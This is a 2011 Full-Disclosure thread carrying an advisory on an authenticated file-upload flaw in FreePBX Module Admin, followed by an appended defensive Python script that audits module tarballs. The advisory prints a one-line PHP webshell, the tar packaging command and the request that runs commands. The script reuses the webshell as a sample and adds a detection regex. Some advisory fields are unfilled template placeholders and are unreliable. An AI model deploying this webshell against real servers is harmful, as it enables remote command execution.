Date: Thu, 9 Jun 2011 18:25:21 -0300
From: Tiago Ferreira <tiago@...igatorteam.org>
To: Tyler Borland <tborland1@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: FreePBX - Module Administration Arbitrary File Upload

Unfortunately it needs administrative access.

On Thu, Jun 9, 2011 at 5:11 PM, Tyler Borland <tborland1@...il.com> wrote:

> So you need administrative access to upload the file?
>
> On Thu, Jun 9, 2011 at 7:24 AM, Tiago Ferreira <tiago@...igatorteam.org> wrote:
>
>> ====[ Alligator Security Team ]===============================================
>>
>> FreePBX - Module Administration Arbitrary File Upload
>>
>> Members: Tiago Ferreira < tiago SPAM alligatorteam.org >
>>
>> ====[ Table of Contents ]=====================================================
>>
>> 1. Overview
>> 2. Detailed description
>> 3. Other Contexts & Solutions
>> 4. Thanks
>> 5. References
>>
>> ====[ Overview ]==============================================================
>>
>>     * Systems affected: FreePBX
>>     * Version: 2.9.0.6 (other versions may be affected)
>>     * Release date: [Example Date]
>>     * Impact: Remote command execution
>>
>> "FreePBX is an easy to use GUI (graphical user interface) that controls
>> and manages Asterisk, the world's most popular open source telephony
>> engine software. FreePBX has been developed and hardened by thousands of
>> volunteers over tens of thousands man hours. FreePBX has been downloaded
>> over 5,000,000 times and estimates over 500,000 active phone systems."[1]
>>
>> The functionality Module Admin, available for authenticated users within
>> the administrative interface of FreePBX, is prone to a vulnerability which
>> enables an attacker to upload malicious PHP files, and thus, perform remote
>> arbitrary code execution within the context of a web server user.
>>
>> ====[ Detailed description ]==================================================
>>
>> In order to exploit this vulnerability and execute remote commands on a
>> vulnerable FreePBX instance, access to Module Admin (Admin > Setup > Module
>> Admin or, Tools > Setup > Module Admin) is needed. This can be acquired by
>> following the given steps:
>>
>> 1. Create a directory like: webshell
>> 2. Get a PHP file web trojan (webshell.php)
>>
>> Ex.: <? if($_GET['cmd']) {  system($_GET['cmd']);  }?>
>>
>> 3. Put this file into the webshell directory and create a tarball. This
>> zip file name needs to follow the given rule: name-version.[tar|tar.gz|tgz],
>> to our webshell we will do this: tar -czvf webshell-1.0.tar.gz webshell/.
>>
>> 4. On the upload form, browse to the file webshell-1.0.tar.gz and send it.
>>
>> When the file is uploaded with success, the path for accessing the trojan
>> will be: /admin/modules/webshell/webshell.php.
>>
>> Now, executing remote system commands is possible using the uploaded
>> trojan.
>>
>> Ex: http://127.0.0.1/admin/modules/webshell/webshell.php?cmd=whoami
>>
>> ====[ Other Contexts & Solutions ]============================================
>>
>> Description of a possible use case of the mentioned vulnerability.
>>
>> Ex (DoS): A potential attacker could take advantage of this issue to
>> disable the services provided by [software/device] for as long as the
>> attack occurs.
>>
>> ====[ Thanks/Acknowledgements ]===============================================
>>
>> - Joaquim Brasil < joaquim SPAM alligatorteam.org >
>>
>>
>> ====[ References ]============================================================
>>
>> - [1] http://www.freepbx.org/
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>

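Added example, not part of the thread above and not FreePBX's own code: a defender-side pre-installation check for a module tarball of the kind the advisory describes. It assumes the advisory's naming rule name-version.[tar|tar.gz|tgz] and that archive entries land under /admin/modules/<name>/; the function names, the regular expressions and the sample archives (built in memory, including one carrying the advisory's one-line shell) are constructions for this example.

```python
"""
Pre-install audit for FreePBX-style module tarballs (added example, not FreePBX code).

Assumptions (from the advisory, not from FreePBX source):
  * uploads are named name-version.tar / .tar.gz / .tgz
  * every entry is extracted under /admin/modules/<name>/
The audit flags three things a webshell upload of the advisory's shape would
trigger: a PHP file that feeds a request parameter into a shell/eval function,
entries that escape the module's own directory, and symlinks/hardlinks.
"""
import io
import re
import tarfile
from typing import Dict, List

# Archive file names must match name-version.[tar|tar.gz|tgz] (advisory's rule)
ARCHIVE_NAME_RE = re.compile(r"^([A-Za-z0-9_]+)-([0-9][0-9A-Za-z.]*)\.(tar|tar\.gz|tgz)$")

# Hypothetical detection pattern: a command-execution or eval function whose
# argument list contains a request superglobal, e.g. system($_GET['cmd'])
SUSPICIOUS_PHP = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(\s*"
    r"[^)]*\$_(GET|POST|REQUEST|COOKIE)\b",
    re.IGNORECASE,
)


def audit_module_archive(archive_name: str, data: bytes) -> List[str]:
    """Return a list of findings; an empty list means nothing suspicious was seen."""
    findings: List[str] = []
    match = ARCHIVE_NAME_RE.match(archive_name)
    if not match:
        return [f"archive name '{archive_name}' does not follow name-version.[tar|tar.gz|tgz]"]
    module = match.group(1)
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tar:
        for member in tar.getmembers():
            path = member.name[2:] if member.name.startswith("./") else member.name
            parts = path.split("/")
            # Every entry must stay inside modules/<module>/: no absolute paths, no '..'
            if path.startswith("/") or ".." in parts or parts[0] != module:
                findings.append(f"{path}: escapes modules/{module}/")
                continue
            if member.issym() or member.islnk():
                findings.append(f"{path}: symlink/hardlink in module archive")
                continue
            if member.isfile() and path.lower().endswith((".php", ".phtml", ".php5")):
                handle = tar.extractfile(member)
                content = handle.read().decode("utf-8", errors="replace") if handle else ""
                if SUSPICIOUS_PHP.search(content):
                    findings.append(f"{path}: shell-like call fed from request parameter")
    return findings


def build_sample_archive(module: str, files: Dict[str, bytes]) -> bytes:
    """Construct a gzipped tarball in memory (sample data for this example only)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in files.items():
            info = tarfile.TarInfo(name=f"{module}/{name}")
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()


# Constructed samples: the advisory's one-liner, a benign module file, and a
# traversal entry that would land outside the module directory.
WEBSHELL = b"<?php if($_GET['cmd']) {  system($_GET['cmd']);  } ?>"
BENIGN = b"<?php function benign_hook() { return 'ok'; } ?>"


def demo():
    """Audit the three constructed archives and return their findings."""
    bad = audit_module_archive(
        "webshell-1.0.tar.gz", build_sample_archive("webshell", {"webshell.php": WEBSHELL}))
    good = audit_module_archive(
        "helper-1.0.tar.gz", build_sample_archive("helper", {"functions.inc.php": BENIGN}))
    traversal = audit_module_archive(
        "evil-2.0.tgz", build_sample_archive("evil", {"../../x.php": BENIGN}))
    return bad, good, traversal


if __name__ == "__main__":
    for label, result in zip(("webshell", "benign", "traversal"), demo()):
        print(f"{label}: {result or 'no findings'}")
```

The content check is deliberately narrow (a request superglobal inside a shell or eval call) so it catches the advisory's shape without flagging every PHP file; the path and link checks are the ones worth keeping regardless, since a module installer that extracts attacker-named entries is exposed even when the payload is not a recognisable webshell.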